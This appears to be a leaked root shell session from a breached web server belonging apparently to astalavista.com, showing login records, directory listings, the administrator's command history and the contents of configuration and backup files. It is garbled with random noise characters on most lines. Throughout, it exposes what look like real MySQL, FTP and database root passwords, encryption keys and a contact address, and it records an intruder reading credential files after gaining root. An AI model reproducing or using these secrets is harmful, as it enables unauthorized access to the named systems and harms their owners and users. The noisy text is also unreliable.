#####################################################$ c) e& {( p2 H5 F ~
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #' j1 Z, `% n7 z3 u0 n$ H2 m( G
# |__| [__ | |__| | |__| | | | [__ | |__| #
5 K; Y8 W- Y( i, H6 R( V- Q# | | ___] | | | |___ | | \/ | ___] | | | #8 `5 [ e' p' F# d* ?5 b( t C% C9 K
# #* B4 a. [: g, E1 ~
#####################################################
; Z& A2 K% t; c! @# #
# i1 f F* Z6 y# Admin Contact - 链接标记support@secureservertech.com #1 Z: {; P* E3 l$ E: u' u/ \
# #
) A$ h4 F$ x/ Q3 X% H# Available ShortCuts #; M* R' r; ^$ A$ \$ l
# #* T% j7 c! b$ X( u7 Y4 g
# nst - list active connections #
- Z. e w" w) W* T% r# ddos - shows how many times each ip is connected #$ z6 O* \ W4 w" @) s9 L, u- ~! _6 ^
# ltr - restart the webserver #
: R. }8 J% D% E# phpc - edit the php config file #
& x/ i( C. M/ t" {# htc - edit the webserver configuration file #
6 Q- o) l. `3 h0 H& Y: o# up - uptime #
5 P# N7 O" r# m2 h* N# etd - edit the motd of the day file #
) C3 J9 o0 l |# htr - start and restart apache if needed #
5 k" @! @$ P% _. }# syng - shows active SYN_RECV connections #/ @& [4 I0 H3 K0 h$ T8 [
# synd - syn flood blocker - “synd -h” for usage #
9 ^$ Y, P! A( G#####################################################
6 c- C. v6 f( t+ Z/ g @2 J _# NOTES: #
0 c0 n! t# j5 u8 C6 L: x. C6 z# Last Upgrade - 12-08-2008 by JF #
3 V+ i% M: F' n% B4 A5 p0 E( P9 c# O# My.cnf/Mysql Optimization - 1-28-09 #; E9 @* F$ {" ~$ |- G2 ^% X
# #
# h: q8 X* h& k+ \& {# #
; l/ }( n/ {6 Z% J8 x# # P4 H, Q9 b5 z c" n
#####################################################/ N. \! h! N! b- Y
6 W X4 e, @. B4 u
sh-3.2# lastlog | grep -v Never
1 T( G: @0 {! t4 z0 L: q" L2 WUsername Port From Latest
+ _- X' X/ U. d0 g" [; {root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 20091 c: c6 S3 E+ q0 ~! |; h
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008. U$ o- @$ K/ M5 r2 t" u
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
: V v2 i6 L8 X/ {, G2 Zastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009$ N3 K! P1 x) @ J
+ A! k# h# W. S$ p
sh-3.2# ls -la# f. {8 ^& N1 a) B1 w
total 453376
4 T" `/ f; L0 _. r1 ]3 `drwxr-x— 15 root root 4096 Jun 4 08:40 .
6 J- M2 a' o' F# Q& rdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..* d( P. J5 @. t% H+ |
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
8 S* _" y/ H" ` K-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg( ^- N$ \+ [- ^3 |+ u! X
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
" u2 y6 w% a" S0 H-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
/ X6 A7 l1 `2 S-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
, u0 o0 [/ r& B* L-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
! E5 K& i h- w) C+ N9 Y-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
' G) D. e- S+ a( ?* ] ^2 C. e-rw-r–r– 1 root root 1327 Nov 29 2007 cert- w( m, s! X3 }4 {: B* `
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
5 B$ w* c) h/ U6 d" j' R4 Ldrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
* O6 q9 n/ W- M2 z* w-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
" J; u7 d2 e* F S3 V-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql5 q2 v. |+ v+ [+ E0 F
drwx—— 2 root root 4096 Oct 28 2007 .elinks( p/ e* s3 `- K- \8 m# X
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.15 R& x& q' I% j7 J) H
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
+ P' B- o8 y0 w* T; z9 W-rw——- 1 root root 0 Apr 16 13:19 .history
) L* X4 q* @" y. o# b6 {, M7 D-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
' x8 f; c" ]* { v: r-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog, o) C% Q# M7 A7 ^& N& [! {
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh8 w" ~% Q- V/ G: n, g
-rw——- 1 root root 35 Jun 2 14:23 .lesshst# j1 F. S6 g6 `) p9 n4 E# g4 f B
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp! Q7 b$ X, T9 \5 T
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
- O. ?$ s- R& C6 Z' v" L4 u-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
( o+ t- d" H a( [3 B R5 W-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2+ I7 X! v5 J% ]- b4 t0 _7 l; F% b
-rwx—— 1 root root 760 Sep 18 2008 lp
! B3 m8 [1 Y |/ g; t; Z* Bdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.18 `1 g _4 V/ ?( k: x) r/ \
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
, ?- ]* Z6 w5 c" W' t) _-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1% J4 C6 |" R4 n. v! g# P) n( J" S
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
! U, @5 J# `+ Y0 u-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
+ I* H) ~' T; n0 R& g3 _2 y2 {drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
* S1 y: r) @1 T2 q1 \ s* \-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz' @! t4 h1 R0 X$ J
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
( h& Q6 s+ b: s" x& @" q-rw——- 1 root root 41 Oct 19 2007 .my.cnf+ j9 ^ n' X. c( T: {0 A: F
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
8 L& f0 j9 E# R* g" e-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport! }& s* o+ V: m+ |$ T+ S+ p3 h
-rw——- 1 root root 41 May 20 2008 .mytop
& _9 T1 D$ m2 A/ Fdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
/ j4 s( Q' X, J% }- W+ l [6 b1 R-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz2 }+ S! |9 `- K E, {
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp7 u8 x0 `: C) y( V! G2 v# h
-rw——- 1 root root 1462 Sep 21 2007 opt.php
" r9 N( {+ M) L0 h0 B-rw-r–r– 1 root root 3371 Sep 22 2007 p+ o1 `9 y4 a( ]4 C
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
% W( G' ^1 A4 `( `-rw——- 1 root root 1024 Feb 3 21:32 .rnd
0 C4 {6 x. |2 ~, d-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
% D5 h0 W4 x5 l. A-rw-r–r– 1 root root 887 Nov 28 2007 server.key
' N. J% |1 \6 I' z. \3 ]drwx—— 2 root root 4096 Oct 10 2008 .ssh
3 L4 e" b x$ P7 x8 l @-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat6 y6 p) Q% U" g% a( r
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
; k t: l) \2 d* ]; V-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
) ~+ f6 |0 ?6 d1 I6 a6 c' m5 f-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1( B; B- }, K7 X _# p
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp9 \8 j: @, N7 s' L) L* G2 ?+ D. C/ }
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh8 h5 K% V! V: M) L
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
# h1 [; V( `" }-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
Q' q+ T9 l3 @8 b# X; z! N9 f5 O-rw——- 1 root root 12997 May 16 2008 .viminfo
7 i/ E) F1 J6 d/ H6 S" G+ ^* C1 j2 F8 g( s Q9 x( k& F% h
sh-3.2# cat .bash_history! v4 ^+ F7 y8 }" n# S f D. f
[snip]8 {# ^8 c2 f% ~7 M4 \2 |8 \ V7 ?
wget cp4sst.com/sstlinux.tar.gz0 `3 t. G# t7 F9 U8 _ ~/ i9 ]
tar zxvf sstlinux.tar.gz6 p4 i- m1 ]( l8 I
cd linux-2.6.27.10
% ?8 ^( z `2 ?9 P# ^9 N& msh install.sh
$ t2 H5 M% N$ A- N v. ~make bzImage ; make modules ; make modules_install ; make install4 v9 [9 F k5 l, K4 e
make clean
! K+ E3 B$ F, M/ _- mservice mysqld restart
% C( O2 `9 V: W# k1 h/ U[snip]* F0 t3 I4 ~4 y) o% Z
cd /usr/sbin/6 j6 L x4 Z3 u: `- ?2 D
chmod 4777 traceroute, W% N, e! c0 Q; A7 T4 l' Q) [1 U
chmod 4777 ping9 l# I& R1 P5 M7 b4 P, K
traceroute -I 链接标记[url]www.astalavista.ch[/url]2 }) S7 H$ w) ]
[snip]+ ?" Q: Q0 F% Q& H! b) j6 g: B
vi /etc/csf/csf.conf4 g1 Q2 h$ v/ U) }0 w- N0 P
traceroute google.ch
0 x- s- Z/ r7 T; w) u- n, Y$ Kservice csf restart
t {1 ]% D4 }tracert google.ch
8 i+ H% Y) q3 v' ^/ [service csf restart2 J( V6 R9 r2 \3 k3 ]
traceroute 链接标记[url]www.google.ch[/url], D" m" t! s, H2 h4 ~5 s
tracert 链接标记[url]www.google.ch[/url]! b% a( r! {: Z# U* ?% d; l
traceroute 链接标记[url]www.google.ch[/url]
5 t2 F9 e; a. o3 e' L7 @$ J- t: ylocate traceroute6 U q/ S2 W/ C- ?2 N
chown 4755 /bin/traceroute ?- q( m' J6 E$ `$ T
chown 4777 /bin/traceroute
) N" k% d0 z1 y3 d# Klocate ping. l8 W% G( V3 T! R) @
chown 4755 /bin/ping7 b+ D/ ]0 t& D; f1 h
chown 4777 /bin/ping2 ? g! L6 T3 ]1 @
cd /bin/! v$ X2 X/ X5 m
ls -ali | grep ping
9 I; S8 H, g f; Kchown root ping' q9 {0 _% R U4 C
chmod 4755 ping0 u) H# D/ ^4 h, d# y% k x8 }. B
ls -ali | grep traceroute
# l2 H K7 J3 Y3 Y; Jchown root traceroute) s9 B1 q, }2 M2 u2 o
chmod 4755 traceroute0 ^' D4 r/ b8 O$ \! J3 P/ d+ M/ H
ls -ali | grep traceroute3 M( W: z( A( K8 H
traceroute -I 链接标记[url]www.google.ch[/url]' U3 E& z8 b3 @: l
traceroute 链接标记[url]www.google.ch[/url]# m4 X( G6 k1 P$ ~% f' S! ~
whois pmsantos.ch+ X/ ?6 X1 p: P& ^" e
[snip]) k) }" |4 Y2 c+ U1 J8 [2 z! U
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
& @4 X0 _0 O' ]7 L+ x6 d: W' \mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql, f3 c! S1 V" y, l
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
( n F/ @2 u; b5 k9 Z# X0 D' w2 Amysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql' k3 ?. o+ h) |0 o6 f1 V
top W) ?0 B6 }( ~7 n. h/ H
ping ssth.ch; z2 \; U. g' K" J- b
ping asdlkfaljgasd???ljg???lasj.ch; A6 }8 L4 } t- ?
ping asdlkfaljgasdlasj.ch# r. B1 J4 C2 k- N' }$ c, _
ping 链接标记[url]www.ssth.ch[/url]
8 {- e9 v, ^1 J( Lping ssth.ch. `: }- z; Y7 @+ Q8 T- A
nslookup 链接标记[url]www.google.ch[/url]2 A7 H7 e( I+ _% v4 v. I# b) z- F
nslookup 链接标记[url]www.ssth.ch[/url]6 L# B# R+ D# M: f& N Y" i
man nslookup
/ L0 |+ K6 Z- {# J" m4 ]ping 链接标记[url]www.google.ch[/url]
4 w! F* K5 I7 B7 p: vnslookup 链接标记[url]www.google.ch[/url]
8 o0 P4 }' Q4 x3 i A! enslookup 链接标记[url]www.google.ch[/url]
( N" v/ S7 S6 ]( Z6 t) a' G0 ynslookup salfjasdlf.ch
0 g: v$ U! x( q/ q6 I[snip], H& W) t7 I s% n) r5 e8 R" |! x
openssl passwd -1 sadf
0 c3 }) B( v ?9 R" zopenssl passwd -1 5cZNHstdTy. O7 m# d" F; U& r
mysql
% u; `6 g* \ @ ]* H. Zmysql" d3 e X6 c v$ a3 s' K
locate proftp
0 A$ U8 c2 W" A! ^vi /etc/proftpd.passwd
0 }' @! }, \5 `! I" c8 Uservice proftpd restart1 A" k$ I& m" l' R
locate proftpd.conf
% w1 i, }9 {6 ~5 O# kvi /etc/proftpd.conf) r# D- b2 g; h
vi /etc/proftpd.passwd& h" S7 ^7 a1 b" t( t8 |. X, Q5 B
service proftpd restart
* b+ F$ M+ N' M4 h[snip]
* }$ i! l% C! x g5 f! ? g/bin/sh /home/com/backup_system/backup.sh. o& u% r& R w1 J- f
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin' M r. L( m0 j( f- ]$ i) M3 ?
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
8 f# `# p/ Y4 i+ tmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
: Q6 A& e9 }6 I! G5 Wls -ali
% o5 h+ t7 z/ M+ Xmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
& E% o4 U8 C1 t) E; t) emysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
- @ L% S) k r% v W7 kcrontab -l' l3 e3 q9 A; H! J5 @6 e9 D: O5 D
crontab -l, t" N, G* l7 j1 v4 p( f
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
F4 u% H6 `. t. O9 H: _/home/com/public_html/modifications/cronjobs/exploits.sh5 _- x @0 R+ Q) A" O5 p
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
7 W. n+ V( ^5 a7 v# j: z# Etar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz9 h# I- _ S7 R9 b; N
cd lsws-4.0.3
; q) H4 o# J9 M: ^* Osh install.sh+ A2 r; p9 t3 l% j2 ~3 l) g
uptime
8 u* ~1 z) r. r1 o+ j6 T6 Nhdparm -tt /dev/sda
+ A8 P4 o- r$ R- w \% A; G. Liostat& V/ i) G3 g" C. z; w0 S8 V
yum install iostat2 s. T$ Q2 D& L! N* _* }
iostat* {# X# z/ F# x7 ?/ [. `
whereis iostat
/ h) g; H5 R" K! ?2 f! N6 E* Zyjm clean all
! _& x0 B( e) {yum clean all ; yum -y update
! T. c- p2 G0 H2 V" ~! [; ]iostat
! V- y, P$ E4 T! L) Zyum install systat
; d; a8 V! t4 b4 U5 z; \5 Krpm -qa | grep iostat
5 @ @6 R) v- j7 W0 Vrpm -qa | grep sysstat& I1 ~ F' L5 {; E E/ W6 H6 S) V
rpm -qa | grep systat
, K# Q' _0 Z( e# {+ Admesg -c
( f4 x3 J2 H4 q& }: D* k( H4 Osysctl -p
* d7 p9 l4 ]' i% p+ B: uuname -r, ^0 H2 d' s5 C! M
cd /usr/src
8 s# J. j* @* h' a2 q! a3 awget nix101.com/kernels/sstlinux.tar.gz b p3 W. g# n% f. l+ a
shutdown -r now
* S2 w" k9 x8 h3 w( [5 L$ Dnano -w /boot/grub/grub.conf
: U- S4 V0 Z/ N
/ D; }7 j/ t, [ t! esh-3.2# cat .my.cnf2 Z% R/ k+ w+ G6 `( s
[client]0 F5 J9 K9 g- ?: S
user=da_admin# c0 D! R. s8 N# W1 l. Z6 a" M( Z6 |
password=X9dctmRH
4 M) u+ S) g0 ^/ O- Q: J, J! O- b
4 b" O* f' T; [* O- F! \1 ush-3.2# cat /home/com/backup_system/backup.sh4 j, u7 P0 ^, Z9 r' p6 X w/ F
#!/bin/sh# A! r$ u/ I* _# U6 m$ t6 W8 e. [, r
##################################################################### _7 R2 [* X/ N" A" X+ k
# #; {0 D% Z. `; z3 k' h( F' H8 b2 V
# incremental backup for astalavista.com #
8 i @. q' B9 t5 I+ Y/ f# #+ a( q& }& J. O
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
2 |+ A5 I$ M9 F6 }# #
0 ~0 t* E/ L, l' M, Y8 y. L#####################################################################; o3 v" n. {' n, Q, V- ?1 X- a
[snip]
/ q$ k G- }6 H2 WPROG_DIR=”/home/com/backup_system”;8 U( |/ K1 ?/ Z
BACKUP_DIR=”/home/com/backups”;
: {0 F' Q& ^. f% TDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”; P; B7 Q4 x' x, F
# ftp for synology backup server
% q7 J3 B5 u1 Z7 S$ C9 nFTP_HOST=”212.254.194.163″;0 D( D# C* i6 n% u
FTP_PORT=”21″;
3 q+ x! a0 H$ b4 d0 S- p) wFTP_USER=”astalavista.com”;3 j2 A+ X' @. X7 I7 b
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;( v+ v6 t) l9 P$ D
FTP_DIR=”/astalavista.com”;
4 h9 ^# Y" i" H3 ~: V( v. u' s9 H# database
& |$ X1 C7 `1 E ?DB_HOST=”localhost”;- o; {9 X& t5 W3 I7 b/ A
DB_USER=”contrexxuser2″;
3 _* _7 s2 u5 y* B1 IDB_PASS=”0fEYNZgXz1pKe”;, K: y) K2 \" c. L
DB_DATABASE1=”com_contrexx2_live”;
" O# T4 s8 F5 R& ZDB_DATABASE2=”com_contrexx2″;
4 X; P3 \1 C! g# Q7 Q/ [8 `[snip]
% J1 x5 _: J' c/ q% g6 V0 p% `1 Oftp -in $FTP_HOST $FTP_PORT <<EOF+ @# j8 ]/ M2 W* Q5 ~
quote USER $FTP_USER
5 f9 e0 D! l2 N/ T- y aquote PASS $FTP_PASS
: c% ]* B A; _9 X( f# K% ^cd $FTP_DIR
, \. \4 p l4 M7 R) U1 Iput $DB_FULLNAME-SQL_Dump.tar# \. c/ q3 n( e: G3 i3 z9 `- ?
put $BACKUP_FULLNAME-Public_HTML.tar
6 Q+ ]9 c' ^7 K! R9 u" R; \close
6 X# z+ C- V: N. ^. y1 \bye
. ^7 ^& p* t/ D) T9 W( yEOF
& N/ S0 ]' {# d- A: ^8 ~5 p: `0 Y+ _1 o2 H* n6 m0 h
sh-3.2# cd /home
9 X; A, N3 e9 ]( X) a: @2 Ush-3.2# ls -la
& n& D( U) v' f4 {$ ^total 120# r/ S5 f; [# y: S
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .' O$ t4 N& ?# @5 i
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
, [8 v3 k' |6 l6 wdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
5 G4 |9 l5 G c! k& a- V; z( P/ o' g-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
7 @4 t- n/ s1 T-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
5 a5 r6 w1 x5 r6 `1 {drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet& }# d( {" u6 v6 B; @
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup% b! k6 v5 O% a8 K, Q. f
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
$ h( n- }8 g$ J( G6 i0 tdrwx–x–x 10 com com 4096 Apr 28 12:40 com9 Y% \4 ]& n9 f: z$ d6 P
drwxr-xr-x 2 root root 4096 May 17 2007 ftp# A9 n" B+ E, V3 ]/ M; D
drwx—— 3 jon jon 4096 Sep 21 2007 jon0 r. @' x0 I% p# T# P
drwx—— 2 root root 16384 Sep 11 2007 lost+found& C- p* ?8 T, D8 V. \8 t$ {
drwxr-xr-x 2 root root 4096 Sep 14 2007 my- |# e; k5 |7 J- _5 V! E- Q5 B& {
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata$ U2 q3 `; W( z& V
drwx—— 2 jon jon 4096 Sep 15 2007 test
6 \( r: N# E" Z( ?drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp, Q# v, ?" B; I
$ {; s% L+ V* K& z1 E0 U" g" H M
sh-3.2# cd admin
& I% N$ @/ u( O9 Q; q$ s4 w( Esh-3.2# ls -la
/ {! u" g# d& H! ~2 _total 1735896/ v. B* }9 O7 J
drwx–x–x 9 admin admin 4096 Nov 28 2007 .) o j! |: n8 F& y% J# o8 @* R
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..% V, w0 V. o( a7 l) s3 W
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
6 j- T) i" i- r* m2 N. \drwx—— 2 admin admin 4096 Sep 28 2007 backups
' b( a u: X$ w9 a, X( `1 d b Y-rw——- 1 admin admin 860 Sep 17 2008 .bash_history* w5 v! N; V z+ ]
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
% ]. A& g2 D+ L* E8 P2 V# D-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile Y) g; C3 i+ F5 R
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
4 [$ F" ^ @- G' wdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups/ N4 n. L i1 e) K$ P' i
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains# \( I$ j n3 c$ }1 l- u
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap0 o1 `! W1 E* R! [
-rw-r–r– 1 root root 24 Sep 21 2007 info.php3 Y/ o" P- J4 a
drwx—— 2 admin admin 4096 Sep 21 2007 mail
/ e5 j7 ?$ P& P. h& a-rw-r–r– 1 root root 716 Nov 28 2007 server.csr) T d6 k# i& \6 ]4 T' r
-rw-r–r– 1 root root 887 Nov 28 2007 server.key- U9 |+ e7 | B+ W8 o% O, n0 t0 |
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow7 l0 b2 X, O6 r6 c
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz4 T1 d ~% x1 w0 ]+ m/ l
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups6 W5 R. ^( c0 t9 j# p$ s, f
4 Z% b+ c+ l W: m4 r- `sh-3.2# ..
# _; ]+ S, v% Q3 M) l4 I, Z6 Rsh-3.2# cd jon
, l" D8 Q' Y% t, N' y/ fsh-3.2# ls -la/ _- l, I+ v2 \: U# N/ s
total 36
% F' Q i& D% T& {" ]drwx—— 3 jon jon 4096 Sep 21 2007 .# D: R5 S# W' l: H1 Y& a
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..; g9 k6 s4 R |9 H5 R) p' [' C( O" z
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
9 e: a' }# H7 W2 _/ }( E! d" m" j-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
" t& |1 V {% M9 F$ B-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
) X3 x5 X2 ]& E% I; T8 m* R-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
9 k. ^$ O/ A5 \+ f+ }- ?/ k-rw-r–r– 1 root root 24 Sep 21 2007 info.php
: M4 ~2 a! s3 R' l5 Adrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
1 F! S$ O5 I0 q2 Z; X6 ]% i
" p2 i- S) X& o2 D3 }sh-3.2# cd ..8 n# i9 i/ B8 C# a+ _: }) K
sh-3.2# cd test
9 O5 }8 r$ J5 H B! \sh-3.2# ls -la. V/ Q$ i& O6 C8 c5 x) i
total 48/ Q5 I4 w& |$ V9 m7 h) r$ ?) I0 z
drwx—— 2 jon jon 4096 Sep 15 2007 ., \9 Z( b& n. A! s" d7 {
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
: c7 \5 L! ?; ]# [-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
5 V& t% u& c! G% ?0 d) W- W-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout6 c- A8 x6 d/ G- F
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile7 w/ I; \, O0 `6 J1 q$ |
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc; c+ W$ Y6 ]5 C( n: @
sh-3.2# cat .bash_history5 _/ M8 j. g" H- P8 \6 e
/usr/bin/mysqladmin -u root password PoliuJhytg67- m+ [5 A* ^7 |$ l- Q& V3 F# I( T2 [* L
- M$ Z* d3 p; o. n/ Zsh-3.2# cd ..: Y3 p/ D& Q% }
sh-3.2# cd astanet
" h! y( X8 |2 W) d9 ksh-3.2# ls -la
+ ^5 r' K7 V" n \0 D* m& \total 52
1 p" z$ ?. `# ~+ I8 zdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
* |* J! B+ z/ Udrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..+ L9 C' v7 L$ m- e. a
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth9 r; n5 }3 B5 N0 X- N
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history; y4 U0 u b) u& D
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout; M s* C7 B$ d% A1 ?/ M- x
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
' S8 t5 f7 L X y' `9 U+ @3 h* W-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
+ f/ V2 R$ u! w( ^# i' l0 ldrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
7 M9 X0 V0 k& |: ~/ Adrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
3 d" [8 M, a; C! P1 B U. |drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
: @# j2 n. l3 g, y2 Z-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
& |. s, }3 P/ T# wlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
1 [8 |" }, Z0 m% @# w9 c6 N-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow* g8 L4 j7 _! M6 t1 q U
9 P8 \# b/ B0 f+ Y2 S% _
sh-3.2# cd auth/
) l$ Q- p: h& t$ \. C3 ?+ S9 ?$ ssh-3.2# ls -la5 \' I7 s/ T8 a% _/ E# B
total 28
z& [3 w/ o# l3 u" a, R9 bdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
; a$ c; Q2 \ idrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
4 @: D) a0 _0 e" r' t0 t) P7 }-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php) Q' p$ j) T8 f! T% Z$ t7 e8 M
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
8 H, Y$ {# ?4 y8 v-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd) v3 M- a+ [9 Q7 e5 M
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
4 V5 [; c: y0 {0 j; s% o; p-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd- d6 y$ @3 ~6 o& b" H z; E
3 N; V# W: O% t( |, R2 O
sh-3.2# cat hackercontest.config.inc.php
7 p( C1 Q; z) }; N0 A<?PHP
3 S) y/ u6 K/ q3 d( C// Variabeln f?r Verbindung zur Datenbank //
6 {( O% X) r% a* z$ I4 @4 o$conxHost = ‘localhost’; // MySQL hostname2 U$ b. C, H$ w9 k% S
$conxUser = ‘hackercontest’; // MySQL user
& ~- {% c+ D0 }& b w$ K$conxPassword = ‘K6m@7dUc’; // MySQL password
' l' ?/ m2 ^; a+ W+ i/ M$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
& `7 g& Z8 {% b% H- Q?>
4 ?/ ?, v: ?9 x2 f O, Y a( Hsh-3.2# cat hosting.config.inc.php
5 m7 @# }0 q* K<?PHP K- d! v! Z6 s3 v
// Variabeln f?r Verbindung zur Datenbank //
+ K0 ^5 O: F3 ~$conxHost = ‘localhost’; // MySQL hostname/ @) X% }- g: S( H. i
$conxUser = ‘hostinguser’; // MySQL user
3 m) L' t- [- ?; n8 c$conxPassword = ‘cXvB3981′; // MySQL password
( C2 _9 ?% z- u( d+ ]( H9 S$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish. x! y9 v3 U7 o* B
?>
8 ` F7 b; |- T% y$ Y5 B
( y( Q* c' k0 ash-3.2# cd ..
1 N8 V& P3 D/ ]+ d- Y. Osh-3.2# cd com
9 i& V/ L0 t' j7 ssh-3.2# ls -la
1 [/ Y1 v/ L# [, f# d6 atotal 141208
y7 f7 R3 F. V" n( l' [drwx–x–x 10 com com 4096 Apr 28 12:40 .
